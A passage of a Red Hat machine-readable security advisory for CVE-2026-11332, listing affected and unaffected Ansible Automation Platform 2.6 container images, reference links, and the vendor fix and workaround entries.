"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-11332"
},
{
"category": "external",
"summary": "RHBZ#2485379",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2485379"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-11332",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-11332"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-11332",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-11332"
},
{
"category": "external",
"summary": "https://github.com/ansible/ansible",
"url": "https://github.com/ansible/ansible"
}
],
"release_date": "2026-06-05T07:12:55.739000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T21:39:16+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50479"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
